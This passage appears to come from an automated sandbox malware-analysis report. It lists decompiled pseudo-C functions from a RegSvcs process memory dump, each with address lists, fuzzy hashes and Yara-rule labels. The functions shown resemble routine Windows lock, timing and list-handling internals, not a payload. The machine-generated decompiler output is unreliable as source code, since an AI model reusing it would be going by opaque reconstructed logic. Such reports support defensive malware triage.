						_t36 = E00B0ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x00b0ae44
0x00b0ae4c
0x00b0ae53
0x00b0ae55
0x00b0ae5c
0x00b0ae64
0x00b0ae68
0x00b0ae75
0x00b0ae75
0x00b0ae78
0x00b0ae7a
0x00b0ae7c
0x00b0ae7f
0x00b0aea8
0x00b0aeab
0x00b0aead
0x00000000
0x00000000
0x00b0aeb3
0x00b0aeb8
0x00b0aebb
0x00b0aebd
0x00000000
0x00b0ae81
0x00b0ae88
0x00b0ae8f
0x00b0ae9b
0x00b0ae96
0x00b0ae96
0x00b0ae96
0x00b0aea0
0x00b0aea3
0x00b0aebf
0x00b0aebf
0x00b0aec3
0x00b0aec9
0x00b0af0d
0x00b0af14
0x00b0af3d
0x00b0af3d
0x00b0af41
0x00b0af44
0x00b0af67
0x00b0af67
0x00b0af6a
0x00b0afca
0x00b0afd1
0x00000000
0x00b0afd1
0x00b0af6c
0x00b0af6d
0x00b0af75
0x00b0af7c
0x00b0af7e
0x00b0af80
0x00b0af85
0x00b0af87
0x00b0af99
0x00b0af89
0x00b0af92
0x00b0af92
0x00b0af9e
0x00b0afa1
0x00b0afa3
0x00b0afa9
0x00b0afb0
0x00b0afb2
0x00b0afb4
0x00b0afbc
0x00b0afbc
0x00b0afb4
0x00b0afb0
0x00000000
0x00b0afa1
0x00b0af4f
0x00b0af57
0x00b0af5c
0x00b0af5e
0x00000000
0x00000000
0x00b0af60
0x00b0af64
0x00b0af64
0x00000000
0x00b0af64
0x00b0af1a
0x00b0af25
0x00000000
0x00000000
0x00b0af27
0x00b0af28
0x00b0af33
0x00000000
0x00b0aed0
0x00b0aed0
0x00b0aed2
0x00b0aee1
0x00b0aee4
0x00000000
0x00000000
0x00b0aee6
0x00b0aeec
0x00000000
0x00000000
0x00b0aefb
0x00b0af07
0x00b0afd3
0x00b0afdb
0x00b0afdb
0x00000000
0x00b0af07
0x00b0aed6
0x00b0aed8
0x00b0aedf
0x00000000
0x00000000
0x00000000
0x00b0aedf
0x00b0aec9

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38ba204f92cfa61a7d122284a7068d276d073c18c09c8c31d050beaee659a666
Instruction ID: 01a6aa7a849de7f76446ff73e5537d321f7fc7d0ae52f0885f6c712ad0501f82
Opcode Fuzzy Hash: 38ba204f92cfa61a7d122284a7068d276d073c18c09c8c31d050beaee659a666
Instruction Fuzzy Hash: 5141E7717003129BD725DA29C895B7BBBDAEF84710F148A99F816CB2D0DB34DC01C693

Uniqueness

Uniqueness Score: -1.00%

Function 00A6DBE9 Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00A6DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E00A4CC50(E00A44510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E00A67D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E00B18ED6(_t102, _t98);
						}
						_t76 = _v44;
						E00A62280(_t58, _v44);
						E00A6DD82(_v44, _t102, _t98);
						E00A6B944(_t102, _v5);
						return E00A5FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0xb38628; // 0x0
							_v28 = _t67;
							_t68 =  *0xb3862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0xb38628; // 0x0
						_t105 = _v28;
						_t80 =  *0xb3862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0xb0fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x00a6dbe9
0x00a6dbf2
0x00a6dbf7
0x00a6dbf9
0x00a6dbfc
0x00a6dc00
0x00a6dc03
0x00a6dc14
0x00a6dd54
0x00a6dd54
0x00a6dd54
0x00a6dc18
0x00a6dc1d
0x00a6dc1d
0x00a6dc32
0x00a6dc3b
0x00a6dc3e
0x00a6dc46
0x00a6dd5b
0x00a6dd62
0x00a6dd64
0x00a6dd67
0x00a6dd69
0x00a6dd6b
0x00a6dd6e
0x00a6dd70
0x00a6dd73
0x00a6dd73
0x00000000
0x00a6dc4c
0x00a6dc4e
0x00ab3ae3
0x00ab3ae8
0x00ab3aea
0x00a6dce7
0x00a6dce9
0x00a6dcec
0x00a6dcee
0x00a6dcf0
0x00a6dcf3
0x00a6dcf5
0x00ab3af2
0x00ab3af5
0x00ab3af5
0x00a6dd06
0x00a6dd08
0x00a6dd0b
0x00a6dd12
0x00ab3b08
0x00a6dd18
0x00a6dd18
0x00a6dd18
0x00a6dd20
0x00a6dd23
0x00ab3b16
0x00ab3b16
0x00a6dd29
0x00a6dd2d
0x00a6dd36
0x00a6dd40
0x00a6dd51
0x00a6dd51
0x00a6dc54
0x00a6dc59
0x00a6dc59
0x00a6dc5e
0x00a6dc5e
0x00a6dc63
0x00a6dc66
0x00a6dc6b
0x00a6dc78
0x00a6dc7b
0x00a6dc81
0x00a6dc81
0x00a6dc83
0x00a6dc89
0x00000000
0x00000000
0x00a6dd7b
0x00a6dd7b
0x00a6dc8f
0x00a6dc8f
0x00a6dc92
0x00a6dc99
0x00a6dc9f
0x00a6dca5
0x00a6dcaa
0x00a6dcaa
0x00a6dcb3
0x00a6dcb8
0x00a6dcbb
0x00a6dcc1
0x00a6dccf
0x00a6dcd2
0x00a6dcd5
0x00a6dcd7
0x00a6dcda
0x00a6dcdc
0x00a6dcdc
0x00a6dce2
0x00a6dce4
0x00000000
0x00a6dce4

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8030f59fe149d30423d97cf23e3715cc6d8f7a9f50ed8188bf7a7ab2046c592b
Instruction ID: 226c6db2c9cac7152727216264d0376b22fb8b7cda511683387e2f036aa01302
Opcode Fuzzy Hash: 8030f59fe149d30423d97cf23e3715cc6d8f7a9f50ed8188bf7a7ab2046c592b
Instruction Fuzzy Hash: B9519C71F01619CFCB14DF68C590AAEBBF5BB48390F20855AEA59EB341DB31AD44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A5EF40 Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00A5EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E00A49080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x775ec21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E00A42D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x00a5ef4b
0x00a5ef4d
0x00a5ef57
0x00a5f0bd
0x00a5f0c2
0x00a5f0d2
0x00a5f0d2
0x00a5f0c2
0x00a5ef5d
0x00a5ef5f
0x00a5ef67
0x00a5ef6a
0x00a5ef6d
0x00a5ef74
0x00a5ef7f
0x00a5ef82
0x00a5ef82
0x00a5ef86
0x00a5ef88
0x00a5ef8c
0x00a5ef8f
0x00a5ef8f
0x00a5ef8f
0x00000000
0x00a5ef91
0x00a5ef93
0x00a5efc4
0x00a5efc4
0x00a5efc4
0x00a5efca
0x00a5efd0
0x00a5f0a6
0x00000000
0x00000000
0x00a5f0af
0x00aabb06
0x00aabb0a
0x00a5f0b5
0x00a5f0b5
0x00a5f0b5
0x00a5f0b5
0x00000000
0x00a5efd6
0x00a5efd9
0x00a5f0de
0x00a5f0e2
0x00a5efdf
0x00a5efdf
0x00a5efdf
0x00a5efe5
0x00aabafc
0x00aabafc
0x00a5efe5
0x00a5efeb
0x00a5efed
0x00a5f00f
0x00a5f011
0x00a5f01a
0x00a5f01d
0x00a5f021
0x00a5f028
0x00a5f029
0x00a5f029
0x00a5f02c
0x00000000
0x00a5f02c
0x00a5eff3
0x00a5eff9
0x00a5f0ea
0x00a5f0ed
0x00a5f0ef
0x00000000
0x00a5f0ef
0x00a5f003
0x00aabb12
0x00a5f045
0x00a5f049
0x00a5f051
0x00a5f09e
0x00a5f0a0
0x00a5f0a0
0x00a5f09e
0x00a5f053
0x00a5f064
0x00a5f064
0x00a5f06b
0x00aabb1a
0x00aabb1a
0x00a5f071
0x00a5f071
0x00a5f07d
0x00a5f082
0x00a5f08f
0x00a5f08f
0x00a5f009
0x00a5f00d
0x00000000
0x00a5f00d
0x00a5efd0
0x00a5ef97
0x00a5efa5
0x00a5efaa
0x00000000
0x00a5efac
0x00a5efac
0x00a5efac
0x00000000
0x00a5efb2
0x00a5f036
0x00a5f03a
0x00a5f040
0x00a5f090
0x00000000
0x00a5f092
0x00a5f042
0x00000000
0x00a5f042
0x00a5efb7
0x00a5efb9
0x00a5efbc
0x00a5efb0
0x00a5efb0
0x00000000
0x00a5efbe
0x00a5efbe
0x00a5efc1
0x00000000
0x00a5efc1
0x00a5efbc
0x00a5efaa
0x00a5ef91

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: 1be1fed7a1e05cb210fdbd144d6c8b5c78a1e17fe884e899d54fde1b7368898c
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 20510130A04249EFDB28CB68C1807AEBBB1BF15315F2881B9DC4593282D775AE8DD751

Uniqueness

Uniqueness Score: -1.00%

Function 00B1740D Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00B1740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E00A9D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E00A8F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L00A64620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L00A64620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E00A8F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L00A64620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x00b1740d
0x00b1740d
0x00b17412
0x00b17413
0x00b17416
0x00b17418
0x00b1741c
0x00b1741f
0x00b17422
0x00b17422
0x00b17428
0x00b1742a
0x00b1742a
0x00b17451
0x00b17432
0x00b1744f
0x00b1744f
0x00000000
0x00b17434
0x00b17438
0x00b17443
0x00b17517
0x00b17517
0x00b1751a
0x00b17535
0x00b17520
0x00b17527
0x00b1752c
0x00b17531
0x00b17533
0x00000000
0x00b17533
0x00000000
0x00b17531
0x00b1754b
0x00b1754f
0x00b1755c
0x00b1755c
0x00b1755f
0x00b17560
0x00b17561
0x00b17562
0x00b17563
0x00b17568
0x00b1756a
0x00b1756c
0x00b1756d
0x00b1756d
0x00b1756f
0x00b17572
0x00b17574
0x00b17577
0x00b1757c
0x00b1757f
0x00000000
0x00b17551
0x00b17551
0x00b17551
0x00b17553
0x00b17553
0x00b17449
0x00b17449
0x00b1744c
0x00b1744c
0x00000000
0x00b1744c
0x00b17443
0x00b1750e
0x00b17514
0x00b17514
0x00b17455
0x00b17469
0x00b1746d
0x00000000
0x00b17473
0x00b17473
0x00b17476
0x00b17480
0x00b17484
0x00b1748e
0x00b17493
0x00b17493
0x00b17496
0x00b17499
0x00b174a1
0x00b174b1
0x00b174b5
0x00000000
0x00b174bb
0x00b174c1
0x00b174c1
0x00b174c4
0x00b174c5
0x00b174c6
0x00b174c7
0x00b174c8
0x00b174cd
0x00000000
0x00b174d3
0x00b174d3
0x00b174d6
0x00b174d8
0x00b174db
0x00b174dd
0x00b174e0
0x00b174e7
0x00b174ee
0x00b174ee
0x00b174f4
0x00b174f9
0x00000000
0x00b174fb
0x00b174fb
0x00b174fd
0x00b17500
0x00b17503
0x00b17505
0x00b17505
0x00b174f9
0x00000000
0x00b174cd
0x00b174b5
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 806a82aa740b8b4e251e1b76495403faf32fe999c1e7434a11550bda1f7278a3
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 4B518B71640606EFCB15CF14C581A96BBF5FF59304F54C0AAE9089F212E771EA86CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A72990 Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00A72990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0xb1ff00);
				E00A9D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0xa21664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E00A8E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0xa21668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E00AC51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0xa2166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E00A72AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E00A56600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E00A72C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E00A5EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E00A72AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E00A72C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E00A72ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E00A9D0D1(_t62);
				goto L28;
			}

0x00a72990
0x00a72992
0x00a72997
0x00a729a3
0x00a729a6
0x00a729ab
0x00a729ad
0x00a729b2
0x00ab5c80
0x00a729b8
0x00a729b8
0x00a729bb
0x00a729c0
0x00a729c5
0x00a729c6
0x00a729c6
0x00a729cb
0x00000000
0x00000000
0x00a729cd
0x00a729d0
0x00a729d9
0x00a729db
0x00a729dd
0x00a72a7f
0x00a72a84
0x00a72a87
0x00a72a89
0x00ab5ca1
0x00ab5ca3
0x00000000
0x00a72a8f
0x00a72a8f
0x00000000
0x00a72a8f
0x00000000
0x00a729e3
0x00a729e3
0x00a729e3
0x00000000
0x00a729e3
0x00a729dd
0x00000000
0x00a729db
0x00a729e6
0x00a729e9
0x00a729eb
0x00a729ed
0x00a729f3
0x00a729f5
0x00a729f8
0x00a729fa
0x00a72a97
0x00a72a9a
0x00a72a9d
0x00a72add
0x00000000
0x00a72a9f
0x00a72aa2
0x00a72aa5
0x00a72aa8
0x00a72aab
0x00ab5cab
0x00ab5caf
0x00ab5cc5
0x00ab5cda
0x00ab5cdc
0x00ab5cdf
0x00ab5ce5
0x00000000
0x00ab5ceb
0x00ab5ced
0x00ab5cee
0x00000000
0x00ab5cee
0x00ab5cb1
0x00ab5cb4
0x00ab5cb9
0x00ab5cbb
0x00000000
